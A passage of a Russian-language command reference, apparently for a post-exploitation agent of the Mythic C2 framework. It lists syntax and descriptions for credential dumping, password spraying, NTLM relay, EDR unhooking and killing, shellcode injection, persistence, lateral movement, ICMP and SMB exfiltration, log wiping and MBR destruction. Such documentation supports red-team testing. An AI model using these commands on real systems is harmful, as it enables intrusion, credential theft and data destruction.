last | `last [-action logins\|failed\|reboot] [-count 25] [-user <username>]` | Показать историю входов, неудачных попыток входа и событий загрузки/выключения системы. Linux: парсинг wtmp/btmp. Windows: журналы безопасности/системы. macOS: нативная команда `last` + унифицированный журнал. (T1087.001, T1110, T1082).
ldap-query | `ldap-query -action <users\|computers\|groups\|domain-admins\|spns\|asrep\|admins\|disabled\|gpo\|ou\|password-never-expires\|trusts\|unconstrained\|constrained\|dacl\|gmsa\|bloodhound\|query> -server <DC>` | Запрос Active Directory через LDAP. Предустановленные запросы для пользователей, компьютеров, групп, администраторов домена, всех администраторов (adminCount), SPN, учетных записей, уязвимых для AS-REP, отключенных учетных записей, GPO, OU, паролей, которые никогда не истекают, доверительных отношений домена, неограниченного/ограниченного делегирования, анализа DACL, извлечения паролей gMSA, сбора BloodHound CE v6 (пользователи/компьютеры/группы/OUs/GPOs/доверия для графового анализа) или пользовательские LDAP-фильтры. Кроссплатформенный (T1087.002, T1482, T1555, T1003, T1615).
ldap-write | `ldap-write -action <add-member\|remove-member\|set-attr\|add-attr\|remove-attr\|set-spn\|disable\|enable\|set-password\|shadow-cred\|clear-shadow-cred\|create-machine\|rbcd\|delete\|gpo-task\|gpo-script\|template-esc1\|template-esc4> -server <DC> -target <obj>` | Изменение объектов AD через LDAP. Членство в группах, атрибуты, SPN, включение/отключение учетной записи, сброс пароля, теневые учетные данные, создание учетной записи компьютера, делегирование RBCD, удаление объекта. Злоупотребление GPO: внедрение запланированных задач (gpo-task) или сценариев запуска (gpo-script). ADCS: изменение шаблонов сертификатов для эксплуатации ESC1/ESC4. Кроссплатформенный (T1098, T1556.006, T1484.001, T1649).
kill | `kill -pid <PID>` | Завершение процесса по PID. Кроссплатформенный (Windows/Linux/macOS).
laps | `laps -server <DC> -username <user@domain> -password <pass> [-filter <computer>]` | Чтение паролей LAPS из AD через LDAP. Поддерживает LAPS v1 (ms-Mcs-AdmPwd) и Windows LAPS v2 (ms-LAPS-Password). Кроссплатформенный (T1552.006).
lsa-secrets | `lsa-secrets -action <dump\|cached>` | **(Только Windows)** Извлечение секретов LSA (пароли служб, ключи DPAPI, учетная запись компьютера) и кэшированных учетных данных домена (DCC2/MSCacheV2 в формате hashcat). Требуется SYSTEM (T1003.004, T1003.005).
launchagent | `launchagent -action <install\|remove\|list> -label <com.example.name> [-path <exe>] [-daemon true]` | **(Только macOS)** Установка, удаление или просмотр элементов LaunchAgent/LaunchDaemon для персистентности. Создает plist с RunAtLoad+KeepAlive.
link | `link -host <ip> -port <port> [-connection_type tcp\|namedpipe] [-pipe_name <name>]` | Подключение к P2P-агенту через TCP или именованный канал для внутреннего перемещения. Режим именованного канала использует порт SMB 445 для более скрытого трафика Windows. TCP — кроссплатформенно, именованный канал — только Windows (T1572).
ln | `ln -target <existing> -link <new> [-symbolic true] [-force true]` | Создание символических или жестких ссылок. Символические ссылки могут указывать на несуществующие пути. Принудительный режим заменяет существующую ссылку. Кроссплатформенный (T1036).
linux-logs | `linux-logs -action <list\|read\|logins\|clear\|truncate\|shred> [-file <path>] [-search <filter>] [-lines <n>]` | **(Только Linux)** Просмотр, чтение, очистка или подделка файлов журналов Linux и бинарных записей входа (wtmp/btmp/utmp). Поддерживает выборочное удаление строк и безопасное уничтожение (T1070.002).
logonsessions | `logonsessions [-action list\|users] [-filter <name>]` | **(Windows, Linux, macOS)** Перечисление активных сеансов входа — пользователи, ID сеансов, станции, состояние подключения. Фильтрация по имени пользователя. Windows: WTS API. Linux: парсинг utmp. macOS: парсинг utmpx.
lolbin | `lolbin -action <technique> -path <payload/code/URL> [-export <func>] [-args <extra>]` | **(Windows, Linux, macOS)** Прокси-выполнение через LOLBin/GTFOBin. Windows: rundll32, msiexec, regsvcs, regasm, mshta, certutil, regsvr32, installutil, vbs. Кроссплатформенно: python, lua, perl, ruby, node, awk. Linux: curl, wget, gcc. macOS: osascript, swift, open, curl. T1218/T1059.
ls | `ls [path]` | Список файлов и папок с владельцем/группой и временными метками. Интеграция с файловым браузером. По умолчанию — текущий каталог.
make-token | `make-token -username <user> -domain <domain> -password <pass> [-action impersonate\|spawn\|auto-verify -command <cmd>]` | **(Только Windows)** Создание токена из учетных данных: олицетворение, создание процесса или **auto-verify** (олицетворение, затем цепочка whoami + getprivs) (T1134.002).
masquerade | `masquerade -source <file> -technique <type> [-disguise <value>] [-in_place]` | Маскировка и скрытие файлов — маскировка файлов (двойное расширение, RtLO, пробел, совпадение с процессом) или скрытие от перечисления (скрыть/показать). Windows: атрибуты +H/+S. Linux: префикс с точкой. macOS: UF_HIDDEN + префикс с точкой (T1036, T1564.001).
mkdir | `mkdir <directory>` | Создание нового каталога (создает родительские каталоги при необходимости).
module-stomp | `module-stomp -pid <PID> [-dll_name <DLL>]` | **(Только Windows)** Внедрение шелл-кода путем затирания секции .text легитимной DLL. Шелл-код выполняется из адресного пространства подписанной DLL, обходя обнаружение приватной памяти (T1055.001).
modules | `modules [-pid <PID>] [-filter <name>]` | Список загруженных модулей/DLL/библиотек в процессе с опциональной фильтрацией по имени. Кроссплатформенный (T1057).
mem-scan | `mem-scan -pid <PID> -pattern <string> [-hex] [-max_results <n>] [-context_bytes <n>]` | Поиск шаблонов байтов в памяти процесса с выводом дампа hex. Windows: VirtualQueryEx/ReadProcessMemory. Linux: /proc/pid/maps+mem. macOS: mach_vm_region/mach_vm_read (только самопросмотр). Поддерживает строковые и шестнадцатеричные шаблоны. Кроссплатформенный (T1005, T1057).
mount | `mount [-filter <substring>] [-fstype <type>]` | Список смонтированных файловых систем с устройством, точкой монтирования, типом и опциями. Поддерживает фильтрацию по имени или типу файловой системы. Кроссплатформенный (T1082).
mv | `mv <source> <destination>` | Перемещение или переименование файла из источника в назначение.
named-pipes | `named-pipes [-filter <pattern>]` | **(Windows, Linux, macOS)** Список именованных каналов (Windows), сокетов домена Unix и FIFO (Linux/macOS) для обнаружения IPC. Поддерживает фильтрацию по подстроке (T1083).
net-enum | `net-enum -action <users\|groups\|groupmembers\|admins\|sessions\|shares\|domainusers\|domaingroups\|domaininfo\|loggedon\|mapped> [-target <host>] [-group <name>]` | **(Windows, Linux, macOS)** Кроссплатформенное сетевое перечисление. Пользователи, группы, члены групп, администраторы, сеансы, общие ресурсы. Windows: Win32 NetAPI (запросы домена, сопоставленные диски). Linux: /etc/passwd + /etc/group + utmp + NFS/Samba. macOS: dscl + who + sharing. (T1033, T1049, T1087, T1135).
net-group | `net-group -action <list\|members\|user\|privileged> -server <DC> [-group <name>] [-user <sAMAccountName>] -username <user@domain> -password <pass>` | Перечисление членства в группах AD через LDAP. Рекурсивное разрешение членов, поиск групп пользователя, перечисление привилегированных групп. Кроссплатформенный (T1069.002).
net-user | `net-user -action <add\|delete\|info\|password\|group-add\|group-remove\|disable\|enable\|lockout> -username <name> [-password <pass>] [-group <group>]` | Управление локальными учетными записями пользователей и членством в группах. Windows: netapi32 API. Linux: useradd/userdel/usermod/chpasswd. macOS: dscl/dseditgroup. Отключение/включение/блокировка для имитации программ-вымогателей T1531. Кроссплатформенный (T1136.001, T1098, T1531).
net-stat | `net-stat [-state <LISTEN\|ESTABLISHED\|...>] [-proto <tcp\|udp>] [-port <number>] [-pid <number>]` | Список активных сетевых соединений и прослушиваемых портов с протоколом, состоянием, PID и именем процесса. Поддерживает фильтрацию по состоянию, протоколу, порту и ID процесса. Кроссплатформенный.
ntdll-unhook | `ntdll-unhook [-action unhook\|check] [-dll ntdll.dll\|kernel32.dll\|kernelbase.dll\|advapi32.dll\|user32.dll\|all] [-source disk\|knowndlls]` | **(Только Windows)** Удаление встроенных хуков EDR из DLL путем восстановления секции .text из чистой копии. Поддерживает 5 DLL или `all`. `check` сообщает о хуках без модификации. Источник `knowndlls` использует объекты раздела \\KnownDlls\\ (избегает дискового ввода-вывода — более безопасно с точки зрения OPSEC) (T1562.001).
syscalls | `syscalls [-action status\|list\|init]` | **(Только Windows)** Непрямой разрешитель системных вызовов. Парсит экспорты ntdll для разрешения номеров системных вызовов Nt* и генерирует заглушки, которые переходят к gadget syscall;ret в ntdll. Когда активен, команды внедрения обходят перехватчики пользовательского режима API (T1106).
opus-injection | `opus-injection` | **(Только Windows)** Внедрение процесса на основе обратных вызовов. Вариант 1: цепочка обработчика Ctrl-C. Вариант 4: PEB KernelCallbackTable. [Подробности](https://github.com/galoryber/fawkes/blob/HEAD/research/injection-techniques.md#opus-injection)
persist | `persist -method <method> -action <install\|remove\|check>` | **(Windows, Linux, macOS)** Установка или удаление персистентности. Windows: реестр, папка автозагрузки, com-hijack, заставка, ifeo, winlogon, print-processor, accessibility, active-setup, time-provider, port-monitor, wmi-event (T1546.003), netsh-helper (T1546.007). Linux: crontab, systemd, shell-profile, ssh-key, xdg-autostart, motd (root, T1546), rc-local (root, T1037.004), apt-hook (root, T1546), udev-rule (root, T1546). macOS: launchagent, periodic (root, T1053.003), folder-action (T1546), login-item (T1547.015), auth-plugin (root, T1547.002), dylib-hijack (T1574.004, scan/install/remove), xpc-service (MachServices + KeepAlive). Все методы поддерживают установку/удаление/список.
persist-enum | `persist-enum [-category <all\|platform-specific>]` | **(Windows, Linux, macOS)** Перечисление механизмов персистентности только для чтения. Windows: реестр, автозагрузка, задачи, службы. Linux: cron, systemd, профили оболочки, SSH-ключи, LD_PRELOAD, правила udev, модули ядра, motd, задания at, службы D-Bus, модули PAM, хуки пакетов, сценарии logrotate, диспетчер NetworkManager, anacron. macOS: LaunchAgents, элементы входа, периодические сценарии, плагины auth, emond, задания at (T1547, T1546, T1053, T1543, T1556).
password-managers | `password-managers [-depth <N>]` | Обнаружение баз данных и конфигурационных файлов менеджеров паролей — KeePass (.kdbx), 1Password, Bitwarden, LastPass, Dashlane, KeePassXC. Кроссплатформенный (T1555).
poolparty-injection | `poolparty-injection` | **(Только Windows)** Внедрение шелл-кода с использованием техник PoolParty, злоупотребляющих внутренними механизмами пулов потоков Windows. Поддерживаются все 8 вариантов. [Подробности](https://github.com/galoryber/fawkes/blob/HEAD/research/injection-techniques.md#poolparty-injection)
ping | `ping -hosts <IP/CIDR/range> [-port 445]` or `ping -action exfil-icmp -target <IP> -file <path>` | Проверка достижимости хостов через TCP-соединение (T1018) + эксфильтрация данных ICMP через полезные нагрузки эхо-запросов с XOR-кодированием и джиттером (T1048.003, T1095).
pipe-server | `pipe-server -action <check\|impersonate> [-name <pipe>] [-timeout 30]` | **(Только Windows)** Олицетворение именованного канала для повышения привилегий. Создание сервера канала, ожидание подключения привилегированного клиента, олицетворение токена. Требуется SeImpersonatePrivilege (T1134.001).
printspoofer | `printspoofer [-timeout 15]` | **(Только Windows)** Повышение привилегий PrintSpoofer — SeImpersonate до SYSTEM через Print Spooler. Создает именованный канал, вызывает подключение спулера через OpenPrinterW, олицетворяет токен SYSTEM. Одношаговое NETWORK SERVICE → SYSTEM (T1134.001).
pkg-list | `pkg-list [-filter <substring>]` | Список установленных пакетов и программного обеспечения. Перечисляет dpkg/rpm/apk (Linux), Homebrew/Applications (macOS) или ключи реестра Uninstall (Windows). Поддерживает фильтрацию по имени. Кроссплатформенный (T1518).
port-scan | `port-scan -hosts <IPs/CIDRs> [-ports <ports>] [-timeout <s>]` | TCP-сканирование подключений для обнаружения сетевых служб. Поддерживает CIDR, диапазоны IP и портов. Кроссплатформенный.
powershell | `powershell <command> [--encoded]` | **(Только Windows)** Выполнение команды PowerShell через powershell.exe с защищенными с точки зрения OPSEC флагами (сокращенные, рандомизированные). Поддерживает режим закодированной команды для сокрытия аргументов от дерева процессов.
prefetch | `prefetch -action <list\|parse\|delete\|clear> [-name <exe>] [-count <max>]` | **(Только Windows)** Разбор и управление файлами Prefetch Windows. Список выполненных программ, разбор истории выполнения (до 8 временных меток), удаление конкретных записей или очистка всех. Поддерживает файлы, сжатые MAM (T1070.004).
privesc-check | `privesc-check -action <all\|auto-escalate\|privileges\|services\|registry\|uac\|dll-hijack\|dll-plant\|dll-sideload\|dll-exports\|hijack-execute\|hijack-deploy\|hijack-cleanup\|hijack-trigger\|service-registry\|...>` | Перечисление и эксплуатация повышения привилегий. `auto-escalate`: автоматизированная цепочка подзадач — перечисляет все векторы, затем пытается выполнить наилучшее доступное повышение (обход UAC, кража токена или sudo). `hijack-execute`: автоматизированная фабрика прокси-DLL — читает экспорты целевой DLL, сервер компилирует прокси-DLL со встроенным шелл-кодом (mingw). `hijack-deploy`: развертывает прокси-DLL (переименовывает оригинал, помещает прокси). `hijack-trigger`: инициирует перехват — перезапуск службы (`-trigger restart -service_name <svc>`) или запуск процесса (`-trigger spawn -source <exe>`) для загрузки прокси-DLL. `hijack-cleanup`: отменяет развернутый перехват (удаляет прокси, восстанавливает оригинал). Windows: привилегии токена, неэкранированные пути служб, AlwaysInstallElevated, автовход, UAC, файлы unattend, сканирование DLL-перехвата (фантомные DLL, доступные для записи PATH, KnownDLLs), размещение DLL с изменением временных меток, боковая загрузка DLL, перечисление экспортов PE (dll-exports с генерацией DEF-файлов), злоупотребление разрешениями реестра служб. Linux: SUID/SGID, возможности, sudo, контейнеры, перехват cron, NFS no_root_squash, модули systemd, токены sudo, перехват PATH, группа docker, опасные группы, правила Polkit, хуки modprobe, внедрение ld.so.preload, модули безопасности (AppArmor/SELinux). macOS: LaunchDaemons, TCC, перехват dylib, SIP. Кроссплатформенный (T1548, T1574.001, T1574.002, T1574.009, T1574.011).
psexec | `psexec -host <target> -command <cmd> [-name <svcname>] [-cleanup <true\|false>]` или `psexec -action check -host <target>` | **(Только Windows)** Выполнение команд на удаленных хостах через создание службы SCM — латеральное перемещение в стиле PSExec. `check` проверяет предварительные требования (SMB 445, доступ к SCM, административные общие ресурсы) без выполнения. MITRE T1021.002, T1569.002.
proc-info | `proc-info -action <info\|connections\|mounts\|modules> [-pid <PID>]` | **(Только Linux)** Глубокий осмотр /proc: детали процесса (cmdline, env, caps, cgroups, пространства имен, файловые дескрипторы), сетевые соединения с разрешением PID, точки монтирования, модули ядра. MITRE T1057.
process-mitigation | `process-mitigation [-action query\|set] [-pid <PID>] [-policy <policy>]` | **(Только Windows)** Запрос или установка политик смягчения процессов (DEP, ASLR, CIG, ACG, CFG). Установка CIG для блокировки загрузки неподписанных DLL (защита от EDR). MITRE T1480.
process-tree | `process-tree [-pid <PID>] [-filter <name>]` | Отображение иерархии процессов в виде дерева с отношениями родитель-потомок. Помогает определить цели для внедрения и инструменты безопасности. Кроссплатформенный (T1057).
procdump | `procdump [-action lsass\|dump\|search] [-pid <PID>]` | Дамп памяти процесса. Windows: MiniDumpWriteDump с автоматическим обнаружением LSASS. Linux: сброс областей /proc/pid/mem. Действие Search находит процессы, содержащие учетные данные. Загружает в Mythic и очищает с диска. MITRE T1003.001, T1003.007.
proxy-check | `proxy-check [-test_url <URL>]` | Обнаружение настроек прокси из переменных среды, конфигурации ОС (реестр, конфигурационные файлы) и транспорта Go. Опциональный тест подключения. Кроссплатформенный (T1016).
ps | `ps [-filter <name>] [-pid <PID>] [-ppid <PPID>] [-user <name>] [-v]` | Список запущенных процессов с интеграцией браузера процессов Mythic. Фильтрация по имени, PID, родительскому PID или имени пользователя. Кроссплатформенный.
ptrace-inject | `ptrace-inject -action <check\|inject> [-pid <PID>] [-filename <shellcode>] [-restore <true>] [-timeout <30>]` | **(Только Linux, amd64/arm64)** Внедрение процесса через ptrace — PTRACE_ATTACH/POKETEXT/SETREGS с восстановлением регистров и кода. Предварительная проверка Yama ptrace_scope с практическими рекомендациями. Режим Check сообщает ptrace_scope, возможности и кандидатов (T1055.008).
pty | `pty [-shell /bin/bash] [-rows 24] [-cols 80]` | **(Linux/macOS)** Запуск интерактивной сессии PTY через интерактивные задачи Mythic. Полная эмуляция терминала с двунаправленным вводом/выводом (T1059).
pwd | `pwd` | Вывод рабочего каталога.
read-memory | `read-memory <dll_name> <function_name> <start_index> <num_bytes>` | **(Только Windows)** Чтение байтов из адреса функции DLL.
reg | `reg -action <read\|write\|delete\|search\|save\|creds> [-hive HKLM] [-path ...] [...]` | **(Только Windows)** Унифицированные операции с реестром — чтение, запись, удаление, поиск и сохранение кустов (T1012, T1112, T1003.002).
remote-reg | `remote-reg -action <query\|enum\|set\|delete> -server <host> -username <user> [-password <pass>\|-hash <NT>] [-hive HKLM] [-path ...] [-name <val>]` | Чтение/запись реестра на удаленных хостах Windows через WinReg RPC по именованным каналам SMB. Поддерживает pass-the-hash. Кроссплатформенный (T1012, T1112, T1021.002).
remote-service | `remote-service -action <list\|query\|create\|start\|stop\|delete\|modify-path\|trigger\|dll-sideload> -server <host> -username <user> [-password <pass>\|-hash <NT>] [-name <svc>] [-binpath <path>]` | Управление службами на удаленных хостах Windows через SVCCTL RPC. Стандартные операции + продвинутое латеральное перемещение: modify-path (перехват пути к двоичному файлу существующей службы), trigger (создание службы, запускаемой по триггеру), dll-sideload (перехват реестра ServiceDll). Pass-the-hash. Кроссплатформенный (T1569.002, T1543.003, T1574.001).
rev2self | `rev2self` | **(Только Windows)** Возврат к исходному контексту безопасности путем удаления активного токена олицетворения.
route | `route [-destination <IP>] [-gateway <IP>] [-interface <name>]` | Отображение таблицы маршрутизации системы с опциональной фильтрацией. Windows: GetIpForwardTable API, Linux: /proc/net/route + IPv6, macOS: netstat -rn. Кроссплатформенный (T1016).
rpfwd | `rpfwd start <port> <remote_ip> <remote_port>` / `rpfwd forward <port> <target_ip> <target_port> [bind_addr]` / `rpfwd stop <port>` | Перенаправление портов: обратное (Mythic направляет к цели) или прямое (агент ретранслирует на внутреннюю цель). Кроссплатформенный (T1090).
rm | `rm [-path <path>] [-secure true]` | Удаление файла или каталога. `-secure true` перезаписывает случайными данными (3 прохода) перед удалением, предотвращая криминалистическое восстановление (T1070.004).
run | `run <command>` | Выполнение команды оболочки и возврат вывода.
runas | `runas -command <cmd> -username <user> -password <pass> [-domain <domain>] [-netonly true]` | Выполнение команды от имени другого пользователя. Windows: CreateProcessWithLogonW (поддерживает /netonly). Linux/macOS: setuid от root или sudo -S с паролем. Кроссплатформенный (T1134.002).
schtask | `schtask -action <create\|query\|delete\|run\|list\|enable\|disable\|stop> -name <name> [-program <path>] [-trigger <type>] [-filter <substring>]` | Управление запланированными задачами. Windows: COM API планировщика задач. Linux: crontab, таймеры systemd, задания at. macOS: LaunchAgents/LaunchDaemons, crontab, at. Кроссплатформенный (T1053).
screenshot | `screenshot [-action single\|record] [-interval <sec>] [-duration <sec>] [-max_frames <n>]` | Захват одного снимка экрана или непрерывная запись с заданным интервалом. Загружает в формате PNG. Режим record: настраиваемый интервал/длительность/макс. кадров, можно остановить через jobkill. Windows: GDI. macOS: screencapture. Linux: автоопределение X11/Wayland. Кроссплатформенный (T1113).
secret-scan | `secret-scan [-path /home/user] [-depth 5] [-max_results 100]` | Поиск в файлах секретов, ключей API, закрытых ключей, строк подключения и чувствительных шаблонов. 42 регулярных выражения (AWS, GitHub, Slack, Stripe, Vault, DigitalOcean, Shopify, Databricks, New Relic, PagerDuty, Okta, Sentry, Datadog, CircleCI и т.д.) с редактированием значений. Обход каталогов с ограничением глубины, пропуск шумных каталогов. Кроссплатформенный (T1552.001, T1005).
secure-delete | `secure-delete [-action delete\|wipe\|wipe-mbr] -path <file_or_device> [-passes <n>] [-confirm DESTROY]` | Безопасное удаление файлов, затирание данных или уничтожение загрузочных записей. `delete`: случайная перезапись + удаление. `wipe`: агрессивное шаблонное уничтожение (T1485). `wipe-mbr`: перезапись загрузочной записи MBR/GPT на устройстве raw-диска (T1561). Требуется подтверждение безопасности. Кроссплатформенный (T1070.004, T1485, T1561).
security-info | `security-info [-action all\|edr\|minifilter-enum\|kernel-drivers]` | Отчет о состоянии безопасности и активных средствах контроля, обнаружение продуктов EDR/XDR (20+ вендоров), перечисление драйверов-минифильтров с классификацией EDR или список загруженных драйверов ядра с анализом EDR/обратных вызовов. SELinux/AppArmor/seccomp/ASLR (Linux), SIP/Gatekeeper/FileVault (macOS), Defender/UAC/Credential Guard/BitLocker (Windows). Кроссплатформенный (T1082, T1518.001).
sniff | `sniff [-action capture\|poison\|relay\|ldap-relay] [-interface eth0] [-duration 30] [-response_ip <target>] [-protocols llmnr,nbtns,mdns] [-ports listen:target]` | Перехват сетевого трафика, отравление и ретрансляция NTLM. `capture`: пассивное извлечение учетных данных (HTTP, FTP, NTLM, Kerberos, LDAP, SMTP AUTH, Telnet). `poison`: активный ответчик с захватом хэшей SMB+HTTP — хэши NTLMv2 в режиме hashcat 5600. `relay`: ретрансляция NTLM на целевой SMB. `ldap-relay`: ретрансляция NTLM на целевой LDAP с операциями после аутентификации (whoami, add-computer, RBCD, dump-laps) (T1040, T1557.001).
share-hunt | `share-hunt -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-depth <n>] [-filter <all\|credentials\|configs\|code>]` | Обход общих ресурсов SMB на нескольких хостах в поисках конфиденциальных файлов — учетных данных, конфигураций, скриптов. Рекурсивный поиск по каталогам с поддержкой pass-the-hash. Кроссплатформенный (T1135, T1039).
smb | `smb -action <shares\|ls\|cat\|upload\|rm\|mkdir\|mv\|push\|exfil\|taint\|share-perms\|share-spider\|share-search> -host <target> -username <user> [-password <pass>] [-hash <NT hash>] [-share <name>] [-path <path>] [-depth <n>] [-extensions <.docx,.xlsx>] [-patterns <*.kdbx,web.config>] [-max_results <n>]` | Операции с файлами SMB2 на удаленных общих ресурсах — просмотр, навигация, чтение/запись/удаление, push для передачи инструментов латерального перемещения, exfil для эксфильтрации данных, taint для размещения файлов. **share-perms**: проверка прав на чтение/запись на всех общих ресурсах. **share-spider**: рекурсивный обход каталогов с фильтрацией по глубине/расширениям. **share-search**: поиск конфиденциальных файлов в общих ресурсах с использованием встроенных или пользовательских шаблонов. Аутентификация NTLM + pass-the-hash. Кроссплатформенный (T1021.002, T1039, T1080, T1135, T1550.002, T1570, T1048.003).
service | `service -action <query\|start\|stop\|restart\|create\|delete\|list\|enable\|disable\|edr-enum\|edr-kill> -name <name> [-binpath <path>] [-confirm EDR-KILL]` | **(Windows, Linux, macOS)** Управление службами + нацеливание на EDR/AV. `edr-enum`: обнаружение установленных служб безопасности (60+ сигнатур). `edr-kill`: остановка+отключение обнаруженного EDR (требуется подтверждение безопасности). Windows SCM, Linux systemd, macOS launchd (T1543, T1489, T1562.001).
setenv | `setenv -action <set\|unset> -name <NAME> [-value <VALUE>]` | Установка или удаление переменных среды в процессе агента. Кроссплатформенный.
shell-config | `shell-config -action <history\|list\|read\|inject\|remove\|clear> [-file <.bashrc>] [-line <cmd>] [-lines <count>]` | Чтение истории оболочки, просмотр/чтение/внедрение/удаление/очистка конфигурационных файлов оболочки. Linux/macOS: bashrc/zshrc. Windows: профили PowerShell + история PSReadLine. T1546.004/T1546.013/T1552.003/T1070.003.
sleep | `sleep [seconds] [jitter] [working_start] [working_end] [working_days]` или `sleep -interval 60 -jitter 30 -jitter_profile normal` | Установка интервала обратного вызова, джиттера, рабочих часов и профиля распределения джиттера (равномерный/нормальный/экспоненциальный). Нормальное распределение группируется вокруг интервала; экспоненциальное имитирует шаблоны активности с паузами.
socks | `socks <start\|stop\|stats\|bandwidth> [port] [-bandwidth_kbs N]` | Запуск, остановка, просмотр статистики или установка пропускной способности для прокси SOCKS5. Поддерживает TCP CONNECT и UDP ASSOCIATE (RFC 1928) для ретрансляции DNS/UDP-инструментов через прокси. Опциональное ограничение пропускной способности на подключение в КБ/с. Статистика показывает активные подключения, байты TX/RX, недавнюю историю.
sort | `sort -path <file> [-reverse true] [-numeric true] [-unique true]` | Сортировка строк файла. Поддерживает алфавитный, числовой, обратный и уникальный режимы. Кроссплатформенный (T1083).
spawn | `spawn -path <exe> [-ppid <pid>] [-blockdlls true]` | **(Только Windows)** Создание приостановленного процесса или потока для внедрения. Поддерживает подмену PPID (T1134.004) и блокировку DLL не от Microsoft.
spray | `spray -action <kerberos\|ldap\|smb> -server <DC> -domain <DOMAIN> -users <user1\nuser2> [-password <pass>] [-hash <NT hash>] [-delay <ms>] [-jitter <0-100>]` | Перебор паролей против AD через предварительную аутентификацию Kerberos, привязку LDAP или аутентификацию SMB. SMB поддерживает pass-the-hash. Учитывает блокировку с настраиваемой задержкой/джиттером. Кроссплатформенный (T1110.003, T1550.002).
ssh | `ssh [-action exec\|push\|check\|tunnel-local\|tunnel-remote\|tunnel-dynamic\|tunnel-list\|tunnel-stop] -host <target> -username <user> [-password <pass>] [-key_path <path>] [-command <cmd>] [-local_port <port>] [-remote_host <host>] [-remote_port <port>]` | Выполнение команд, передача файлов или создание SSH-туннелей. `check` проверяет предварительные требования SSH (порт, аутентификация, оболочка). tunnel-local (-L), tunnel-remote (-R), tunnel-dynamic (-D SOCKS5). Кроссплатформенный (T1021.004, T1570, T1572).
ssh-agent | `ssh-agent [-action <list\|enum>] [-socket /path/to/agent.sock]` | **(Linux/macOS)** Перечисление сокетов SSH-агента и список загруженных ключей. Обнаруживает SSH_AUTH_SOCK, сканирует /tmp/ssh-*, /run/user/*, связку ключей GNOME. Сообщает отпечатки ключей в хранилище учетных данных (T1552.004).
ssh-keys | `ssh-keys -action <list\|add\|remove\|read-private\|enumerate\|generate\|find-reachable\|try-keys\|auto-move> [-key <ssh_key>] [-user <username>] [-targets <range>] [-host <ip>] [-username <user>] [-command <cmd>]` | Управление SSH-ключами и автоматизация латерального перемещения. Чтение/внедрение authorized_keys, чтение закрытых ключей, генерация пар ключей, перечисление SSH-конфигов. Латеральное перемещение: find-reachable (сканирование подсети), try-keys (тестирование ключей), auto-move (цепочка сканирование→аутентификация→выполнение). Windows: сессии PuTTY/реестр, ключи .ppk, WSL, OpenSSH, SSH-конфиг Git. Кроссплатформенный (T1552.004, T1552.002, T1098.004, T1021.004, T1046).
stat | `stat -path <file_or_dir>` | Отображение метаданных файла/каталога: тип, размер, разрешения, временные метки. Платформозависимые детали — inode/владелец (Linux/macOS), атрибуты файла (Windows). Учитывает символические ссылки через Lstat. Кроссплатформенный (T1083).
strings | `strings -path <file> [-min_length <n>] [-pattern <text>] [-offset <bytes>] [-max_size <bytes>]` | Извлечение печатных ASCII-строк из файлов. Поиск встроенного текста, URL, учетных данных в бинарниках. Фильтр по шаблону, управление минимальной длиной, смещение/макс. размер. Кроссплатформенный (T1005).
start-clr | `start-clr [-action execute-assembly -assembly <b64> -arguments <args>]` | **(Только Windows)** Инициализация CLR v4 или выполнение сборок .NET. Действие `execute-assembly` автоматически патчит AMSI+ETW и запускает сборку за один шаг (как execute-assembly в Cobalt Strike). Ручной режим с -amsi_patch/-etw_patch для тонкого контроля.
systemd-persist | `systemd-persist -action <install\|remove\|list> -name <unit> [-exec_start <cmd>] [-timer <calendar>] [-system true]` | **(Только Linux)** Установка, удаление или просмотр systemd-сервиса/таймера для персистентности. Область пользователя или системы. MITRE T1543.002.
steal-token | `steal-token -pid <pid> [-action spawn -command <cmd>]` | **(Только Windows)** Кража токена из другого процесса: олицетворение или создание процесса с ним (T1134.002).
token-store | `token-store -action <save\|list\|use\|remove\|history> -name <label>` | **(Только Windows)** Хранилище именованных токенов — сохранение, список, восстановление, удаление и просмотр истории смены удостоверений. Позволяет быстро переключаться между украденными/созданными удостоверениями без повторной кражи (T1134.001).
suspend | `suspend -action <suspend\|resume> -pid <PID>` | Приостановка или возобновление процесса. Тактическая пауза EDR/AV во время чувствительных операций. Windows: NtSuspendProcess/NtResumeProcess. Linux/macOS: SIGSTOP/SIGCONT. Кроссплатформенный (T1562.001).
sysinfo | `sysinfo [-action info\|full-profile]` | Комплексная информация о системе: версия ОС, оборудование, память, время работы, домен, .NET (Windows), статус SELinux/SIP. `full-profile` запускает автоматизированную 5-шаговую цепочку профилирования хоста (sysinfo → ps → security-info → privesc-check → persist-enum). Кроссплатформенный (T1082).
sysmon-config | `sysmon-config [-action check\|rules\|events]` | **(Только Windows)** Обнаружение установки Sysmon и извлечение конфигурации — статус службы/драйвера, алгоритм хэша, флаги опций, размер данных правил, каналы событий. Обнаруживает переименованные установки через высоту минифильтра (T1518.001, T1562.001).
tac | `tac -path <file>` | Вывод строк файла в обратном порядке. Полезно для просмотра журналов от новых к старым. Кроссплатформенный (T1083).
tail | `tail -path <file> [-lines <N>] [-head true] [-bytes <N>]` | Чтение первых или последних N строк/байт файла без передачи всего содержимого. Кольцевой буфер для эффективного чтения хвоста, обратный поиск для больших файлов. Кроссплатформенный (T1005, T1083).
tcc-check | `tcc-check [-service <filter>]` | **(Только macOS)** Перечисление разрешений TCC (Transparency, Consent, and Control). Обнаружение, какие приложения имеют доступ к камере, микрофону, записи экрана, полному доступу к диску. Группировка по службе с сводкой разрешенных (T1082).
touch | `touch -path <file> [-mkdir true]` | Создание пустого файла или обновление временных меток существующего. Опциональное создание родительского каталога. Кроссплатформенный (T1106).
thread-hijack | `thread-hijack -pid <PID> [-tid <TID>]` | **(Windows, macOS)** Внедрение шелл-кода через перехват выполнения потока — приостановка существующего потока, перенаправление PC/RIP на шелл-код, возобновление. macOS использует Mach API (task_for_pid + thread_get/set_state), требуется root (T1055.003).
threadless-inject | `threadless-inject` | **(Только Windows)** Внедрение шелл-кода с использованием безнитевого внедрения путем перехвата функции DLL в удаленном процессе. Более скрытно, чем обычное внедрение, так как не создает новые потоки.
